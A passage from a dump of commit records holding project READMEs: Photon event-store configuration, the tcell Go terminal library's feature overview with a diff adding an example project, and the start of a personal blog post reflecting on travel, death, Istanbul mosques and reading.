amqp:\/\/localhost)\n-parallel.projections : Number of cores assigned for parallel stream processing (default = number of cores on your machine)\n-projections.path : Local folder with projections, in EDN format, to pre-load on start (default = \/tmp\/photon)\n-db.backend : DB backend plugin to use (default=h2). Depending on the build of photon, this can be one of:\n h2, cassandra, redis, file, mongo, riak, dummy.\n-h2.path : If using H2, the file prefix for the database file, including path (default = \/tmp\/photon.h2)\n-cassandra.ip : If using Cassandra, the host of the cluster\n-file.path : If using files as backend, the absolute path to the file\n-mongodb.host : If using MongoDB, the host of the cluster\n-riak.default_bucket : If using Riak, the name of the bucket\n-riak.node.X : If using Riak, the nodes that form the cluster (riak.node.1, riak.node.2, etc.)\n```\n\n### Setting up a file for static configuration\n\nPhoton can be configured either directly from the command line or from a file, and parameters can be combined from different sources. The order of priority in which the configuration is build is the following:\n\n1. Command-line arguments\n2. photon.properties in the working directory\n3. resources\/photon.properties\n4. 
resources\/config.properties\n\nExample of property file:\n\n```\n# Microservice identifier (default = photon):\nmicroservice.name=photon\n# AMQP endpoint (default = amqp:\/\/localhost):\nmuon.url=amqp:\/\/username:password@localhost\n# Number of cores assigned for parallel stream processing\n# (default = number of cores on your machine):\nparallel.projections=8\n# Local folder with projections, in EDN format, to pre-load on start\n# (default = \/tmp\/photon):\nfile.path=\/path\/to\/edn-files\/\n# DB backend plugin to use, several options currently available:\ndb.backend={file,mongodb,riak,cassandra}\n# Depending on the backend, you'll need to set up the DB plugin:\ncassandra.ip=127.0.0.1\nfile.path=\/path\/to\/file.json\nmongodb.host=localhost\nriak.default_bucket=photon-eventstore-v1\nriak.node.1=riak1.yourdomain.com\nriak.node.2=riak2.yourdomain.com\nriak.node.3=riak3.yourdomain.com\n```\n\n### Muon schemas\n\nThe endpoints and expected schemas to interact with `photon` can be found [here](doc\/schemas.md).\n\n###\u00a0Testing\n\nTests are run by executing\n\n```\nlein midje\n```\n\nTo run the test suite from the REPL:\n\n```bash\nlein repl\n=> (use 'midje.sweet)\n=> (autotest)\n```\n\nAlternatively, create a test photon client to interact with photon:\n\n```bash\nlein new muon-clojure photon-test-client\n```\n\n### Profiling\n\nIn order to achieve the best performance and thoughput, photon has been intensively tested and profiled with the [YourKit](https:\/\/www.yourkit.com) profiler, with a license kindly provided by their creators as part of their support to the open source community.\n\nimage:https:\/\/www.yourkit.com\/images\/yklogo.png[YourKit logo]\n\nYourKit supports open source projects with its full-featured Java Profiler.\nYourKit, LLC is the creator of <a href=\"https:\/\/www.yourkit.com\/java\/profiler\/index.jsp\">YourKit Java Profiler<\/a>\nand <a href=\"https:\/\/www.yourkit.com\/.net\/profiler\/index.jsp\">YourKit .NET Profiler<\/a>,\ninnovative and intelligent tools for profiling Java and .NET applications.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"776d98d3850b48f1938592ddf528ba0bae9bccd7","subject":"Add tpong to examples list","message":"Add tpong to examples list","repos":"zyedidia\/tcell,gdamore\/tcell,zyedidia\/tcell,gdamore\/tcell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= tcell\n\n\nimage:https:\/\/img.shields.io\/travis\/gdamore\/tcell.svg?label=linux[Linux Status,link=\"https:\/\/travis-ci.org\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/appveyor\/ci\/gdamore\/tcell.svg?label=windows[Windows Status,link=\"https:\/\/ci.appveyor.com\/project\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/badge\/license-APACHE2-blue.svg[Apache License,link=\"https:\/\/github.com\/gdamore\/tcell\/blob\/master\/LICENSE\"]\nimage:https:\/\/img.shields.io\/badge\/godoc-reference-blue.svg[GoDoc,link=\"https:\/\/godoc.org\/github.com\/gdamore\/tcell\"]\nimage:http:\/\/goreportcard.com\/badge\/gdamore\/tcell[Go Report Card,link=\"http:\/\/goreportcard.com\/report\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/discord\/639503822733180969?label=discord[Discord,link=\"https:\/\/discord.gg\/urTTxDN\"]\nimage:https:\/\/codecov.io\/gh\/gdamore\/tcell\/branch\/master\/graph\/badge.svg[codecov,link=\"https:\/\/codecov.io\/gh\/gdamore\/tcell\"]\n\n[cols=\"2\",grid=\"none\"]\n|===\n|_Tcell_ is a _Go_ package that provides a cell based view for text terminals, like _xterm_.\nIt was inspired by _termbox_, but 
includes many additional improvements.\na|[.right]\nimage::logos\/tcell.png[float=\"right\"]\n|===\n\n## Examples\n\n* https:\/\/github.com\/gdamore\/proxima5[proxima5] - space shooter (https:\/\/youtu.be\/jNxKTCmY_bQ[video])\n* https:\/\/github.com\/gdamore\/govisor[govisor] - service management UI (http:\/\/2.bp.blogspot.com\/--OsvnfzSNow\/Vf7aqMw3zXI\/AAAAAAAAARo\/uOMtOvw4Sbg\/s1600\/Screen%2BShot%2B2015-09-20%2Bat%2B9.08.41%2BAM.png[screenshot])\n* mouse demo - included mouse test (http:\/\/2.bp.blogspot.com\/-fWvW5opT0es\/VhIdItdKqJI\/AAAAAAAAATE\/7Ojc0L1SpB0\/s1600\/Screen%2BShot%2B2015-10-04%2Bat%2B11.47.13%2BPM.png[screenshot])\n* https:\/\/github.com\/gdamore\/gomatrix[gomatrix] - converted from Termbox\n* https:\/\/github.com\/zyedidia\/micro\/[micro] - lightweight text editor with syntax-highlighting and themes\n* https:\/\/github.com\/viktomas\/godu[godu] - simple golang utility helping to discover large files\/folders.\n* https:\/\/github.com\/rivo\/tview[tview] - rich interactive widgets for terminal UIs\n* https:\/\/github.com\/marcusolsson\/tui-go[tui-go] - UI library for terminal apps (_deprecated_)\n* https:\/\/github.com\/rgm3\/gomandelbrot[gomandelbrot] - Mandelbrot!\n* https:\/\/github.com\/senorprogrammer\/wtf[WTF] - Personal information dashboard for your terminal\n* https:\/\/github.com\/browsh-org\/browsh[browsh] - A fully-modern text-based browser, rendering to TTY and browsers (https:\/\/www.youtube.com\/watch?v=HZq86XfBoRo[video])\n* https:\/\/github.com\/sachaos\/go-life[go-life] - Conway's Game of Life.\n* https:\/\/github.com\/gcla\/gowid[gowid] - compositional widgets for terminal UIs, inspired by urwid\n* https:\/\/termshark.io[termshark] - a terminal UI for tshark, inspired by Wireshark, built on gowid\n* https:\/\/github.com\/MichaelS11\/go-tetris[go-tetris] - Go Tetris with AI option\n* https:\/\/github.com\/junegunn\/fzf[fzf] - A command-line fuzzy finder\n* https:\/\/github.com\/esimov\/ascii-fluid[ascii-fluid] - A terminal based ASCII fluid simulation controlled by webcam\n* https:\/\/gitlab.com\/tslocum\/cbind[cbind] - Provides key event encoding, decoding and handling\n* https:\/\/github.com\/spinzed\/tpong[tpong] - The old-school Pong remade in terminal\n\n## Pure Go Terminfo Database\n\n_Tcell_ includes a full parser and expander for terminfo capability strings,\nso that it can avoid hard coding escape strings for formatting. It also favors\nportability, and includes support for all POSIX systems.\n\nThe database is also flexible & extensible, and can be modified by either running\na program to build the entire database, or an entry for just a single terminal.\n\n## More Portable\n\n_Tcell_ is portable to a wide variety of systems.\n_Tcell_ is believed\nto work with all of the systems officially supported by golang with\nthe exception of nacl (which lacks any kind of a terminal interface).\n(Plan9 is not supported by _Tcell_, but it has experimental status only\nin golang.) 
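\n\nOne practical consequence of this portability: on the pure Go targets (see the\nSolaris\/illumos caveat below), an application built on _Tcell_ cross-compiles\nwith nothing more than the standard Go environment variables. A sketch, with a\nhypothetical `myapp` package:\n\n[source,shell]\n----\nGOOS=freebsd GOARCH=amd64 go build -o myapp.freebsd .\nGOOS=linux GOARCH=arm64 go build -o myapp.linux-arm64 .\n----\n\n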
For all of these systems *except Solaris\/illumos*, _Tcell_\nis pure Go, with no need for CGO.\n\n## No Async IO\n\n_Tcell_ is able to operate without requiring `SIGIO` signals (unlike _termbox_),\nor asynchronous I\/O, and can instead use standard Go file\nobjects and Go routines.\nThis means it should be safe, especially for\nuse with programs that use exec, or otherwise need to manipulate the\ntty streams.\nThis model is also much closer to idiomatic Go, leading\nto fewer surprises.\n\n## Rich Unicode & non-Unicode support\n\n_Tcell_ includes enhanced support for Unicode, including wide characters and\ncombining characters, provided your terminal can support them.\nNote that\nWindows terminals generally don't support the full Unicode repertoire.\n\nIt will also convert to and from Unicode locales, so that the program\ncan work with UTF-8 internally, and get reasonable output in other locales.\n_Tcell_ tries hard to convert to native characters on both input and output, and\non output _Tcell_ even makes use of the alternate character set to facilitate\ndrawing certain characters.\n\n## More Function Keys\n\n_Tcell_ also has richer support for a larger number of special keys that some terminals can send.\n\n## Better Color Handling\n\n_Tcell_ will respect your terminal's color space as specified within your terminfo\nentries, so that for example attempts to emit color sequences on VT100 terminals\nwon't result in unintended consequences.\n\nIn Windows mode, _Tcell_ supports 16 colors, bold, dim, and reverse,\ninstead of just termbox's 8 colors with reverse. (Note that there is some\nconflation between bold\/dim and colors.)\n\n_Tcell_ maps 16 colors down to 8, for terminals that need it.\n(The upper 8 colors are just brighter versions of the lower 8.)\n\n## Better Mouse Support\n\n_Tcell_ supports enhanced mouse tracking mode, so your application can receive\nregular mouse motion events, and wheel events, if your terminal supports it.\n\n## _Termbox_ Compatibility\n\nA compatibility layer for _termbox_ is provided in the `compat` directory.\nTo use it, try importing `github.com\/gdamore\/tcell\/termbox`\ninstead. Most _termbox-go_ programs will probably work without further\nmodification.\n\n## Working With Unicode\n\nInternally Tcell uses UTF-8, just like Go.\nHowever, Tcell understands how to\nconvert to and from other character sets, using the capabilities of\nthe `golang.org\/x\/text\/encoding` packages.\nYour application must supply\nthem, as the full set of the most common ones bloats the program by about 2MB.\nIf you're lazy, and want them all anyway, see the `encoding` sub-directory.\n\n## Wide & Combining Characters\n\nThe `SetContent()` API takes a primary rune, and an optional list of combining runes.\nIf any of the runes is a wide (East Asian) rune occupying two cells,\nthen the library will skip output from the following cell, but care must be\ntaken in the application to avoid explicitly attempting to set content in the\nnext cell, otherwise the results are undefined. (Normally the wide character\nis displayed, and the other character is not; do not depend on that behavior.)\n\nExperience has shown that the vanilla Windows 8 console application does not\nsupport any of these characters properly, but at least some options like\n_ConEmu_ do support Wide characters.\n\n## Colors\n\n_Tcell_ assumes the ANSI\/XTerm color model, including the 256 color map that\nXTerm uses when it supports 256 colors. The terminfo guidance will be\nhonored, with respect to the number of colors supported. 
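\n\nYou can check what your terminal advertises, and therefore what _Tcell_ will\nhonor, by querying terminfo directly with the standard ncurses tools:\n\n[source,shell]\n----\n# Number of colors the current terminal claims to support.\ntput colors\n\n# Show the color-setting capabilities terminfo defines for it.\ninfocmp -1 | grep -E 'colors|setaf|setab'\n----\n\n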
Also, only\nterminals which expose ANSI style `setaf` and `setab` will support color;\nif you have a color terminal that only has `setf` and `setb`, please let me\nknow; it wouldn't be hard to add that if there is need.\n\n## 24-bit Color\n\n_Tcell_ _supports true color_! (That is, if your terminal can support it,\n_Tcell_ can accurately display 24-bit color.)\n\nTo use 24-bit color, you need to use a terminal that supports it. Modern\nxterm and similar terminal emulators can support this. As terminfo lacks any\nway to describe this capability, we fabricate the capability for\nterminals with names ending in `*-truecolor`. The stock distribution ships\nwith a database that defines `xterm-truecolor`.\nTo try it out, set your\n`TERM` variable to `xterm-truecolor`.\n\nWhen using TrueColor, programs will display the colors that the programmer\nintended, overriding any \"`themes`\" you may have set in your terminal\nemulator. (For some cases, accurate color fidelity is more important\nthan respecting themes. For other cases, such as typical text apps that\nonly use a few colors, it's more desirable to respect the themes that\nthe user has established.)\n\nIf you find this undesirable, you can either use a `TERM` variable\nthat lacks the `TRUECOLOR` setting, or set `TCELL_TRUECOLOR=disable` in your\nenvironment.\n\n## Performance\n\nReasonable attempts have been made to minimize sending data to terminals,\navoiding repeated sequences or drawing the same cell on refresh updates.\n\n## Terminfo\n\n(Not relevant for Windows users.)\n\nThe Terminfo implementation operates with two forms of database. The first\nis the built-in go database, which contains a number of real database entries\nthat are compiled into the program directly. This should minimize calling\nout to database file searches.\n\nThe second is in the form of JSON files that contain the same information,\nwhich can be located either by the `$TCELLDB` environment variable, `$HOME\/.tcelldb`,\nor in the Go source directory as `database.json`.\n\nThese files (both the Go and the JSON files) can be generated using the\nmkinfo.go program. If you need to regenerate the entire set for some reason,\nrun the mkdatabase.sh file. The generation uses the infocmp(1) program on\nthe system to collect the necessary information.\n\nThe `mkinfo.go` program can also be used to generate specific database entries\nfor named terminals, in case your favorite terminal is missing. (If you\nfind that this is the case, please let me know and I'll try to add it!)\n\n_Tcell_ requires that the terminal support the `cup` mode of cursor addressing.\nTerminals without absolute cursor addressability are not supported.\nThis is unlikely to be a problem; such terminals have not been mass produced\nsince the early 1970s.\n\n## Mouse Support\n\nMouse support is detected via the `kmous` terminfo variable, however,\nenablement\/disablement and decoding mouse events is done using hard coded\nsequences based on the XTerm X11 model. As of this writing all popular\nterminals with mouse tracking support this model. (Full terminfo support\nis not possible as terminfo sequences are not defined.)\n\nOn Windows, the mouse works normally.\n\nMouse wheel buttons on various terminals are known to work, but the support\nin terminal emulators, as well as support for various buttons and\nlive mouse tracking, varies widely. 
Modern _xterm_, macOS _Terminal_, and _iTerm_ all work well.\n\n## Testability\n\nThere is a `SimulationScreen` that can be used to simulate a real screen\nfor automated testing. The supplied tests do this. The simulation contains\nevent delivery, screen resizing support, and capabilities to inject events\nand examine \"`physical`\" screen contents.\n\n## Platforms\n\n### POSIX (Linux, FreeBSD, macOS, Solaris, etc.)\n\nFor mainstream systems with a suitably well-defined system call interface\nto tty settings, everything works using pure Go.\n\nFor the remainder (right now that means only Solaris\/illumos) we use POSIX function\ncalls to manage termios, which implies that CGO is required on those platforms.\n\n### Windows\n\nWindows console mode applications are supported. Unfortunately _mintty_\nand other _cygwin_ style applications are not supported.\n\nModern console applications like ConEmu, as well as the Windows 10\nconsole itself, support all the good features (resize, mouse tracking, etc.)\n\nI haven't figured out how to cleanly resolve the dichotomy between cygwin\nstyle termios and the Windows Console API; it seems that perhaps nobody else\nhas either. If anyone has suggestions, let me know! Really, if you're\nusing a Windows application, you should use the native Windows console or a\nfully compatible console implementation.\n\n### Plan9 and Native Client (Nacl)\n\nThe nacl and plan9 platforms won't work, but compilation stubs are supplied\nfor folks that want to include parts of this in software targeting those\nplatforms. The Simulation screen works, but as Tcell doesn't know how to\nallocate a real screen object on those platforms, `NewScreen()` will fail.\n\nIf anyone has wisdom about how to improve support for either of these,\nplease let me know. PRs are especially welcome.\n\n### Commercial Support\n\n_Tcell_ is absolutely free, but if you want to obtain commercial, professional support, there are options.\n\n[cols=\"2\",align=\"center\",frame=\"none\", grid=\"none\"]\n|===\n^.^|\nimage:logos\/tidelift.png[100,100]\na|\nhttps:\/\/tidelift.com\/[Tidelift] subscriptions include support for _Tcell_, as well as many other open source packages.\n\n^.^|\nimage:logos\/staysail.png[100,100]\na|\nmailto:info@staysail.tech[Staysail Systems, Inc.] 
offers direct support, and custom development around _Tcell_ on an hourly basis.\n\n^.^|\nimage:logos\/patreon.png[100,100]\na|I also welcome donations at https:\/\/www.patreon.com\/gedamore\/[Patreon], if you just want to make a contribution.\n|===\n","old_contents":"= tcell\n\n\nimage:https:\/\/img.shields.io\/travis\/gdamore\/tcell.svg?label=linux[Linux Status,link=\"https:\/\/travis-ci.org\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/appveyor\/ci\/gdamore\/tcell.svg?label=windows[Windows Status,link=\"https:\/\/ci.appveyor.com\/project\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/badge\/license-APACHE2-blue.svg[Apache License,link=\"https:\/\/github.com\/gdamore\/tcell\/blob\/master\/LICENSE\"]\nimage:https:\/\/img.shields.io\/badge\/godoc-reference-blue.svg[GoDoc,link=\"https:\/\/godoc.org\/github.com\/gdamore\/tcell\"]\nimage:http:\/\/goreportcard.com\/badge\/gdamore\/tcell[Go Report Card,link=\"http:\/\/goreportcard.com\/report\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/discord\/639503822733180969?label=discord[Discord,link=\"https:\/\/discord.gg\/urTTxDN\"]\nimage:https:\/\/codecov.io\/gh\/gdamore\/tcell\/branch\/master\/graph\/badge.svg[codecov,link=\"https:\/\/codecov.io\/gh\/gdamore\/tcell\"]\n\n[cols=\"2\",grid=\"none\"]\n|===\n|_Tcell_ is a _Go_ package that provides a cell based view for text terminals, like _xterm_.\nIt was inspired by _termbox_, but includes many additional improvements.\na|[.right]\nimage::logos\/tcell.png[float=\"right\"]\n|===\n\n## Examples\n\n* https:\/\/github.com\/gdamore\/proxima5[proxima5] - space shooter (https:\/\/youtu.be\/jNxKTCmY_bQ[video])\n* https:\/\/github.com\/gdamore\/govisor[govisor] - service management UI (http:\/\/2.bp.blogspot.com\/--OsvnfzSNow\/Vf7aqMw3zXI\/AAAAAAAAARo\/uOMtOvw4Sbg\/s1600\/Screen%2BShot%2B2015-09-20%2Bat%2B9.08.41%2BAM.png[screenshot])\n* mouse demo - included mouse test (http:\/\/2.bp.blogspot.com\/-fWvW5opT0es\/VhIdItdKqJI\/AAAAAAAAATE\/7Ojc0L1SpB0\/s1600\/Screen%2BShot%2B2015-10-04%2Bat%2B11.47.13%2BPM.png[screenshot])\n* https:\/\/github.com\/gdamore\/gomatrix[gomatrix] - converted from Termbox\n* https:\/\/github.com\/zyedidia\/micro\/[micro] - lightweight text editor with syntax-highlighting and themes\n* https:\/\/github.com\/viktomas\/godu[godu] - simple golang utility helping to discover large files\/folders.\n* https:\/\/github.com\/rivo\/tview[tview] - rich interactive widgets for terminal UIs\n* https:\/\/github.com\/marcusolsson\/tui-go[tui-go] - UI library for terminal apps (_deprecated_)\n* https:\/\/github.com\/rgm3\/gomandelbrot[gomandelbrot] - Mandelbrot!\n* https:\/\/github.com\/senorprogrammer\/wtf[WTF]- Personal information dashboard for your terminal\n* https:\/\/github.com\/browsh-org\/browsh[browsh] - A fully-modern text-based browser, rendering to TTY and browsers (https:\/\/www.youtube.com\/watch?v=HZq86XfBoRo[video])\n* https:\/\/github.com\/sachaos\/go-life[go-life] - Conway's Game of Life.\n* https:\/\/github.com\/gcla\/gowid[gowid] - compositional widgets for terminal UIs, inspired by urwid\n* https:\/\/termshark.io[termshark] - a terminal UI for tshark, inspired by Wireshark, built on gowid\n* https:\/\/github.com\/MichaelS11\/go-tetris[go-tetris] - Go Tetris with AI option\n* https:\/\/github.com\/junegunn\/fzf[fzf] - A command-line fuzzy finder\n* https:\/\/github.com\/esimov\/ascii-fluid[ascii-fluid] - A terminal based ASCII fluid simulation controlled by webcam\n* https:\/\/gitlab.com\/tslocum\/cbind[cbind] - Provides key event encoding, decoding and 
handling\n\n## Pure Go Terminfo Database\n\n_Tcell_ includes a full parser and expander for terminfo capability strings,\nso that it can avoid hard coding escape strings for formatting. It also favors\nportability, and includes support for all POSIX systems.\n\nThe database is also flexible & extensible, and can modified by either running\na program to build the entire database, or an entry for just a single terminal.\n\n## More Portable\n\n_Tcell_ is portable to a wide variety of systems.\n_Tcell_ is believed\nto work with all of the systems officially supported by golang with\nthe exception of nacl (which lacks any kind of a terminal interface).\n(Plan9 is not supported by _Tcell_, but it is experimental status only\nin golang.) For all of these systems *except Solaris\/illumos*, _Tcell_\nis pure Go, with no need for CGO.\n\n## No Async IO\n\n_Tcell_ is able to operate without requiring `SIGIO` signals (unlike _termbox_),\nor asynchronous I\/O, and can instead use standard Go file\nobjects and Go routines.\nThis means it should be safe, especially for\nuse with programs that use exec, or otherwise need to manipulate the\ntty streams.\nThis model is also much closer to idiomatic Go, leading\nto fewer surprises.\n\n## Rich Unicode & non-Unicode support\n\n_Tcell_ includes enhanced support for Unicode, including wide characters and\ncombining characters, provided your terminal can support them.\nNote that\nWindows terminals generally don't support the full Unicode repertoire.\n\nIt will also convert to and from Unicode locales, so that the program\ncan work with UTF-8 internally, and get reasonable output in other locales.\n_Tcell_ tries hard to convert to native characters on both input and output, and\non output _Tcell_ even makes use of the alternate character set to facilitate\ndrawing certain characters.\n\n## More Function Keys\n\n_Tcell_ also has richer support for a larger number of special keys that some terminals can send.\n\n## Better Color Handling\n\n_Tcell_ will respect your terminal's color space as specified within your terminfo\nentries, so that for example attempts to emit color sequences on VT100 terminals\nwon't result in unintended consequences.\n\nIn Windows mode, _Tcell_ supports 16 colors, bold, dim, and reverse,\ninstead of just termbox's 8 colors with reverse. (Note that there is some\nconflation with bold\/dim and colors.)\n\n_Tcell_ maps 16 colors down to 8, for terminals that need it.\n(The upper 8 colors are just brighter versions of the lower 8.)\n\n## Better Mouse Support\n\n_Tcell_ supports enhanced mouse tracking mode, so your application can receive\nregular mouse motion events, and wheel events, if your terminal supports it.\n\n## _Termbox_ Compatibility\n\nA compatibility layer for _termbox_ is provided in the `compat` directory.\nTo use it, try importing `github.com\/gdamore\/tcell\/termbox`\ninstead. 
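\n\nA quick way to migrate a small project is to rewrite the import path across the\ntree (a sketch using standard tools; review the resulting diff afterwards):\n\n[source,shell]\n----\ngrep -rl 'github.com\/nsf\/termbox-go' . | xargs sed -i 's|github.com\/nsf\/termbox-go|github.com\/gdamore\/tcell\/termbox|g'\n----\n\n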
Most _termbox-go_ programs will probably work without further\nmodification.\n\n## Working With Unicode\n\nInternally Tcell uses UTF-8, just like Go.\nHowever, Tcell understands how to\nconvert to and from other character sets, using the capabilities of\nthe `golang.org\/x\/text\/encoding packages`.\nYour application must supply\nthem, as the full set of the most common ones bloats the program by about 2MB.\nIf you're lazy, and want them all anyway, see the `encoding` sub-directory.\n\n## Wide & Combining Characters\n\nThe `SetContent()` API takes a primary rune, and an optional list of combining runes.\nIf any of the runes is a wide (East Asian) rune occupying two cells,\nthen the library will skip output from the following cell, but care must be\ntaken in the application to avoid explicitly attempting to set content in the\nnext cell, otherwise the results are undefined. (Normally wide character\nis displayed, and the other character is not; do not depend on that behavior.)\n\nExperience has shown that the vanilla Windows 8 console application does not\nsupport any of these characters properly, but at least some options like\n_ConEmu_ do support Wide characters.\n\n## Colors\n\n_Tcell_ assumes the ANSI\/XTerm color model, including the 256 color map that\nXTerm uses when it supports 256 colors. The terminfo guidance will be\nhonored, with respect to the number of colors supported. Also, only\nterminals which expose ANSI style `setaf` and `setab` will support color;\nif you have a color terminal that only has `setf` and `setb`, please let me\nknow; it wouldn't be hard to add that if there is need.\n\n## 24-bit Color\n\n_Tcell_ _supports true color_! (That is, if your terminal can support it,\n_Tcell_ can accurately display 24-bit color.)\n\nTo use 24-bit color, you need to use a terminal that supports it. Modern\nxterm and similar teminal emulators can support this. As terminfo lacks any\nway to describe this capability, we fabricate the capability for\nterminals with names ending in `*-truecolor`. The stock distribution ships\nwith a database that defines `xterm-truecolor`.\nTo try it out, set your\n`TERM` variable to `xterm-truecolor`.\n\nWhen using TrueColor, programs will display the colors that the programmer\nintended, overriding any \"`themes`\" you may have set in your terminal\nemulator. (For some cases, accurate color fidelity is more important\nthan respecting themes. For other cases, such as typical text apps that\nonly use a few colors, its more desirable to respect the themes that\nthe user has established.)\n\nIf you find this undesirable, you can either use a `TERM` variable\nthat lacks the `TRUECOLOR` setting, or set `TCELL_TRUECOLOR=disable` in your\nenvironment.\n\n## Performance\n\nReasonable attempts have been made to minimize sending data to terminals,\navoiding repeated sequences or drawing the same cell on refresh updates.\n\n## Terminfo\n\n(Not relevent for Windows users.)\n\nThe Terminfo implementation operates with two forms of database. The first\nis the built-in go database, which contains a number of real database entries\nthat are compiled into the program directly. This should minimize calling\nout to database file searches.\n\nThe second is in the form of JSON files, that contain the same information,\nwhich can be located either by the `$TCELLDB` environment file, `$HOME\/.tcelldb`,\nor is located in the Go source directory as `database.json`.\n\nThese files (both the Go and the JSON files) can be generated using the\nmkinfo.go program. 
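\n\nTo see the kind of raw capability data the generator consumes, you can run\ninfocmp yourself against any terminal name:\n\n[source,shell]\n----\n# Dump the terminfo entry for xterm-256color, one capability per line.\ninfocmp -1 xterm-256color\n----\n\n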
If you need to regnerate the entire set for some reason,\nrun the mkdatabase.sh file. The generation uses the infocmp(1) program on\nthe system to collect the necessary information.\n\nThe `mkinfo.go` program can also be used to generate specific database entries\nfor named terminals, in case your favorite terminal is missing. (If you\nfind that this is the case, please let me know and I'll try to add it!)\n\n_Tcell_ requires that the terminal support the `cup` mode of cursor addressing.\nTerminals without absolute cursor addressability are not supported.\nThis is unlikely to be a problem; such terminals have not been mass produced\nsince the early 1970s.\n\n## Mouse Support\n\nMouse support is detected via the `kmous` terminfo variable, however,\nenablement\/disablement and decoding mouse events is done using hard coded\nsequences based on the XTerm X11 model. As of this writing all popular\nterminals with mouse tracking support this model. (Full terminfo support\nis not possible as terminfo sequences are not defined.)\n\nOn Windows, the mouse works normally.\n\nMouse wheel buttons on various terminals are known to work, but the support\nin terminal emulators, as well as support for various buttons and\nlive mouse tracking, varies widely. Modern _xterm_, macOS _Terminal_, and _iTerm_ all work well.\n\n## Testablity\n\nThere is a `SimulationScreen`, that can be used to simulate a real screen\nfor automated testing. The supplied tests do this. The simulation contains\nevent delivery, screen resizing support, and capabilities to inject events\nand examine \"`physical`\" screen contents.\n\n## Platforms\n\n### POSIX (Linux, FreeBSD, macOS, Solaris, etc.)\n\nFor mainstream systems with a suitably well defined system call interface\nto tty settings, everything works using pure Go.\n\nFor the remainder (right now means only Solaris\/illumos) we use POSIX function\ncalls to manage termios, which implies that CGO is required on those platforms.\n\n### Windows\n\nWindows console mode applications are supported. Unfortunately _mintty_\nand other _cygwin_ style applications are not supported.\n\nModern console applications like ConEmu, as well as the Windows 10\nconsole itself, support all the good features (resize, mouse tracking, etc.)\n\nI haven't figured out how to cleanly resolve the dichotomy between cygwin\nstyle termios and the Windows Console API; it seems that perhaps nobody else\nhas either. If anyone has suggestions, let me know! Really, if you're\nusing a Windows application, you should use the native Windows console or a\nfully compatible console implementation.\n\n### Plan9 and Native Client (Nacl)\n\nThe nacl and plan9 platforms won't work, but compilation stubs are supplied\nfor folks that want to include parts of this in software targetting those\nplatforms. The Simulation screen works, but as Tcell doesn't know how to\nallocate a real screen object on those platforms, `NewScreen()` will fail.\n\nIf anyone has wisdom about how to improve support for either of these,\nplease let me know. PRs are especially welcome.\n\n### Commercial Support\n\n_Tcell_ is absolutely free, but if you want to obtain commercial, professional support, there are options.\n\n[cols=\"2\",align=\"center\",frame=\"none\", grid=\"none\"]\n|===\n^.^|\nimage:logos\/tidelift.png[100,100]\na|\nhttps:\/\/tidelift.com\/[Tidelift] subscriptions include support for _Tcell_, as well as many other open source packages.\n\n^.^|\nimage:logos\/staysail.png[100,100]\na|\nmailto:info@staysail.tech[Staysail Systems, Inc.] 
offers direct support, and custom development around _Tcell_ on an hourly basis.\n\n^.^|\nimage:logos\/patreon.png[100,100]\na|I also welcome donations at https:\/\/www.patreon.com\/gedamore\/[Patreon], if you just want to make a contribution.\n|===\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"483fa8425888f764afddec9feb3628942ea96421","subject":"Update 2017-10-02-Kisa-Kisa-2.adoc","message":"Update 2017-10-02-Kisa-Kisa-2.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nOn the trips I have been taking once a week for a while now, I have come to notice that every journey reminds me of death in a serious way. These journeys keep making me remember a truth that I (we) shake off behind cemetery walls in daily life. In fact I have only just realized that every journey has, to a greater or lesser degree, been calling it back to mind. The question of why fastened onto this intuition straight away. The first answer that came to me was this: \"Death, after all, is a journey too. These short journeys are a miniature of that great journey.\" I also weighed myself like this: \"Or is what you are feeling the fear of not being able to return?\", \"Is it that you see death, too, as a departure with no return, and your fondness for this World is what brings it to mind?\" I laid both thoughts on the two pans of the scale; like children playing on a seesaw, I could not see which were down and which were up.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAt the end of these journeys I let myself fall into the lap of a friend. It was nowhere other than the Mihrimah Sultan Mosque of \u00dcsk\u00fcdar, which I had been away from for a few months, and in whose courtyard I used to lose myself in the scampering of the cats. Each time I watch its rose-figure from afar and make my way toward it with a little longing and a little joy. As night draws its blackest sheet over the sky I step into the courtyard, and two friends, it and the Valide Sultan Mosque, begin to converse. I do not interrupt them; I listen, with the sound of the waters flowing from the \u015fad\u0131rvan to one side. The sun shows itself, leaving its shyness behind the crimson glow. I see another friend, a friend that staying away could not make distant. Then I say: \"Seeing a friend is a festival.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nWhat with travel, school and work, a busyness closes in on me from all four sides. Having the tasks and duties ahead occupy my mind is, I think, the more tiring part of it. In the middle of this busyness I kept watching for a moment to read a certain piece, and it simply would not come. When I did read it, I took a pleasure from it that I normally would not have. I think the eagerness I show for reading forms a bond between me and the book or the text. The same thing happens when I am weary in spirit and mind, or in the moments I feel lonely - and though I have lived alone for years, the times I feel lonely are fewer than the loneliness I feel amid crowds. A character in the novel touches my shoulder, another holds out a hand, the next one smiles. The best example of this was _Nisan'\u0131n 2 G\u00fcn\u00fc_; plain and simple as its narration was, it was a novel in which I found myself a place. I had come across it in the school library a few years ago and borrowed it. I remember reading it one winter day with my back against the radiator. The radiator had become one wall of the 